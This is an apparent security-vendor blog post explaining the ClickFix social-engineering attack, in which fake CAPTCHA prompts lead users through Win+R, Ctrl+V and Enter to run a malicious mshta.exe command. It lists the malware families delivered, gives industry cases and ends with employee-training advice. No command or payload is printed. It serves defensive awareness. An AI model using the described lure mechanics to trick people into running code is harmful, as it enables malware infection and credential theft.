Digital Risk: Enterprises Need More Than Cyber Insurance
Threatonomics

Understanding the ClickFix attack

by Emma McGowan , Senior Writer
Published

How three keystrokes can lead to malware infection

Imagine a cyberattack so simple yet so deceptive that all it takes is three keystrokes to compromise your system. This is the reality of the ClickFix attack, a threat that Resilience threat researchers have observed in the wild since 2024 and that seems to be ramping up in recent weeks. ClickFix cleverly manipulates users into executing malicious commands under the guise of a routine bot verification test. Originally used in targeted attacks, this technique has rapidly gained traction, posing a significant risk to a broader audience.

At first glance, ClickFix appears harmless—just another “Verify You Are a Human” CAPTCHA-like prompt. However, beneath this familiar facade lies a dangerous trick: users are guided through three seemingly benign keystrokes that ultimately lead to malware installation. 

This attack preys on human behavior, exploiting trust in common online interactions to deploy password-stealing malware (aka infostealers), remote access trojans (RATs), and other malicious payloads. With cybercriminals refining their tactics to maximize efficiency and deception, understanding the mechanics of ClickFix is critical to preventing its spread.

How the ClickFix attack works

ClickFix thrives on social engineering, manipulating users into unwittingly executing malicious commands. This attack preys on human tendencies to solve perceived problems quickly, especially when faced with urgent or authoritative prompts. Because ClickFix requires user interaction, it can often evade automated security solutions that rely on detecting self-executing malware. 

The attack typically begins with a deceptive pop-up on a compromised or malicious website. This pop-up mimics a standard bot verification message, often displaying an “I’m not a robot” checkbox. Upon interaction, users are prompted to complete three simple steps to confirm their identity.

The first step instructs users to press the Windows Key + R simultaneously. This shortcut opens the Run dialog box, a legitimate Windows feature that allows users to execute commands and programs quickly.

Next, users are told to press CTRL + V, which pastes preloaded malicious code from the website’s virtual clipboard into the Run prompt. This action happens silently, meaning users may not even realize they have copied a harmful command.

Finally, pressing Enter executes the pasted command, triggering a download and execution of malicious code via mshta.exe, a Windows utility designed to run Microsoft HTML application files. This step compromises the device, enabling malware installation.

What malware does ClickFix deliver?

ClickFix has been linked to several well-known malware families, including:

  • XWorm
  • Lumma stealer
  • VenomRAT
  • AsyncRAT
  • Danabot
  • NetSupport RAT

The specific payloads vary but commonly include PowerShell scripts, JavaScript, or portable executable (PE) files. These malware variants are often designed to steal financial credentials, log keystrokes, and grant remote attackers full control over an infected device.

Examples of ClickFix in the wild

ClickFix quickly expanded beyond its initial targeted attacks and now affects a range of industries and individuals. Cybercriminals use phishing emails, compromised websites, and social engineering tactics to deploy this attack across different sectors. While any internet user could potentially fall victim to ClickFix, specific industries have been disproportionately targeted due to their reliance on online communications and digital workflows.

Hospitality

A phishing campaign impersonating Booking.com has been leveraging ClickFix to target hospitality organizations. Fraudulent emails reference negative guest reviews, booking requests, or promotional opportunities to lure recipients into clicking malicious links. Microsoft tracks this campaign as Storm-1865, noting that it has been active since at least December 2024.

Healthcare

Cybersecurity firm Arctic Wolf has observed ClickFix attacks targeting healthcare professionals. One notable instance involved malicious code injected into the HEP2go physical therapy video site, redirecting users to ClickFix prompts.

Car dealerships

In March 2025, DarkReading reported on a ClickFix attack targeting car dealerships. More than 100 automotive industry websites were infected via the streaming service provider LES Automotive. It’s the second major attack on an auto industry third-party vendor in less than a year, following the CDK Global takedown last June.

General public

According to the U.S. Department of Health and Human Services, ClickFix has extensive reach and has appeared in many services used by the general public. Variants of this attack have been observed in:

  • Fake Google Chrome error pages
  • Pop-ups spoofing Facebook login pages
  • Impersonations of PDFSimpli and reCAPTCHA
  • Instances invoking PowerShell scripts from remote websites

How to protect yourself (and your organization) against ClickFix

Because ClickFix relies on social engineering, the best defense is employee education. Security training should always include guidance on how to recognize a phishing scheme, as well as regular phishing attempts by your IT team. With that in mind, here are some best practices to defend against phishing: 

  • Educate employees on how to recognize phishing scams.
  • Warn employees to be skeptical of unexpected pop-ups requesting key combinations.
  • Encourage checking the sender’s email address carefully before taking action.
  • Advise contacting service providers directly to verify suspicious messages.
  • Caution against responding to emails with urgent calls to action.
  • Instruct employees to hover over links to inspect the full URL before clicking.
  • Teach employees to look for typos and subtle misspellings in emails and URLs.

The ClickFix attack is a reminder that cyber threats continue to evolve, finding new ways to bypass traditional security measures. Even seemingly innocuous actions—like pressing a few keys—can lead to real consequences if people are tricked into running malicious code.

Vigilance and skepticism are critical defenses against these attacks. Organizations and individuals must educate themselves on emerging threats, implement strong security protocols, and stay ahead of cybercriminal tactics.

About the Author
Emma McGowan , Senior Writer

Emma McGowan is the Senior Writer for industry-leading cyber risk company Resilience. She has been a full-time writer and editor for over 10 years, focused on technology and women’s health. Tech-fluent and highly motivated, Emma brings holistic experience leading brands in the delivery of high-quality, high-impact, multimedia digital content supported by strategy, planning, and performance analysis.

You might also like

Why vendor discovery matters now (and how most organizations get it wrong)

The average enterprise relies on hundreds—sometimes thousands—of third-party vendors to operate. Yet when security leaders are asked for a complete inventory of these vendors, the response is often a patchwork of spreadsheets, outdated procurement lists, and educated guesses. This vendor blindness isn’t just an operational inconvenience—it’s a critical business risk that’s becoming increasingly expensive to […]

The healthcare cybersecurity crisis that’s costing organizations millions in damages

The U.S. healthcare sector faces an unprecedented cybersecurity crisis. With 168 million healthcare records breached in 2023 and ransomware attacks surging 32% in 2024, the industry confronts threats that have evolved beyond data theft to sophisticated campaigns capable of paralyzing critical patient care infrastructure. Despite these trends, cybersecurity often receives insufficient leadership attention. A 2025 […]

Your cyber insurance policy could be a target

Organizations invest heavily in cyber insurance policies to shield their businesses from evolving threats, but many overlook a critical vulnerability: the security of the insurance policy documents themselves. While these policies are designed to protect you from cyber threats, they can become powerful weapons when they fall into the wrong hands. Over the past year, […]

A complete guide to domain spoofing

Domain spoofing is a cyberattack technique most commonly used in phishing and fraud, where criminals impersonate a legitimate organization’s domain name to deceive users. Think of it as digital identity theft at scale: Attackers make fraudulent emails or websites appear as if they originate from your trusted company domain, tricking victims into revealing sensitive data, […]

The 3 types of CISOs: How to succeed in any version – and what to do when you’re misaligned

As the CISO, are you and your organization in alignment? The CISO role has evolved dramatically over the past decade, but organizational cybersecurity programs have not always kept pace.  If you think about CISOs like software versions, version 1.0 is your first generation of CISOs, focused on structure and technical architecture. Version 2.0 moves beyond […]

The Security Squeeze

One of the most important features of the Resilience SaaS platform is our Quantified Cyber Action Plan. It supports CISOs making decisions under risk and uncertainty by providing a prioritization for which cyber controls should be implemented, based on their ROI. The power of this approach lies in the fact that it guides the most […]